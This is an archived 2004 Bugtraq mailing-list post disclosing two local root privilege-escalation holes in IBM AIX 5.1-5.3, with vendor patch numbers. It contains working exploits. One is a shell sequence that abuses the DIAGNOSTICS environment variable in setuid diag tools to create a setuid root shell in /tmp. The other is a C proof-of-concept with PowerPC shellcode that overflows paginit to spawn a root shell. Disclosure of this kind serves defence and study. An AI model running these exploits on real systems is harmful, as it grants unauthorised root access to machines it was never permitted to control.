lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 20 Dec 2004 12:10:41 +0100 From: cees-bart <ceesb@...ru.nl> To: bugtraq@...urityfocus.com Subject: AIX 5.1/5.2/5.3 local root exploits hi, i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 (unix for IBM RS/6000 powerpc). 1) the first is a bug in all setuid diag related tools that use an environment variable as a prefix to an external binary executed as root. 2) the second is a classical stack overflow in a tool called paginit. status: vendor contacted, patches are available: 1) for the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and IY64277(5.3). 2) for the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and IY64312(5.3). bug descriptions below. regards, cees-bart phd student @ university of nijmegen --- bug 1: there are (at least) 4 broken suid binaries. -r-sr-xr-x 1 root system 10014 Sep 16 2002 /usr/sbin/lsmcode -r-sr-x--- 1 root system 2796 Jan 26 2003 /usr/sbin/diag_exec -r-sr-xr-x 1 root system 450433 Apr 08 2004 /usr/sbin/invscout -r-sr-xr-x 1 root system 511362 Apr 08 2004 /usr/sbin/invscoutd all these binaries are exploited the same way: the path set in the $DIAGNOSTICS environment is used by these binaries to execute $DIAGNOSTICS/bin/Dctrl as root (duh). for example; executing the following gives a root shell: mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat > /tmp/aap/bin/Dctrl << EOF #!/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh bug 2: the following setuid binary: -r-sr-xr-x 1 root security 7354 Mar 12 2003 /usr/bin/paginit does not do a bounds check on the first commandline argument, which is supposed to be a username. if you feed paginit the proper data and hit enter, root priviledges are gained. POC exploit code: /* exploit for /usr/bin/paginit tested on: AIX 5.2 if the exploit fails it's because the shellcode ends up at a different address. use dbx to check, and change RETADDR accordingly. cees-bart <ceesb@...ru.nl> */ #define RETADDR 0x2ff22c90 char shellcode[] = "\x7c\xa5\x2a\x79" "\x40\x82\xff\xfd" "\x7c\xa8\x02\xa6" "\x38\xe0\x11\x11" "\x39\x20\x48\x11" "\x7c\xc7\x48\x10" "\x38\x46\xc9\x05" "\x39\x25\x11\x11" "\x38\x69\xef\x17" "\x38\x87\xee\xef" "\x7c\xc9\x03\xa6" "\x4e\x80\x04\x20" "\x2f\x62\x69\x6e" "\x2f\x73\x68\x00" ; char envlabel[] = "X="; void printint(char* buf, int x) { buf[0] = x >> 24; buf[1] = (x >> 16) & 0xff; buf[2] = (x >> 8) & 0xff; buf[3] = x & 0xff; } int main(int argc, char **argv) { char *env[3]; char code[1000]; char buf[8000]; char *p, *i; int offset1 = 0; offset1 = 0; // atoi(argv[1]); memset(code, 'C', sizeof(code)); memcpy(code, envlabel,sizeof(envlabel)-1); // landingzone for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4) printint(i, 0x7ca52a79); memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1); code[sizeof(code)-1] = 0; env[0] = code; env[1] = 0; memset(buf, 'A', sizeof(buf)); buf[sizeof(buf)-1] = 0; p = buf; p += 4114; printint(p,RETADDR); // try to hit the landingzone p += 72; printint(p, RETADDR); // any readable address (apparently not overwritten) execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env); }
Powered by blists - more mailing lists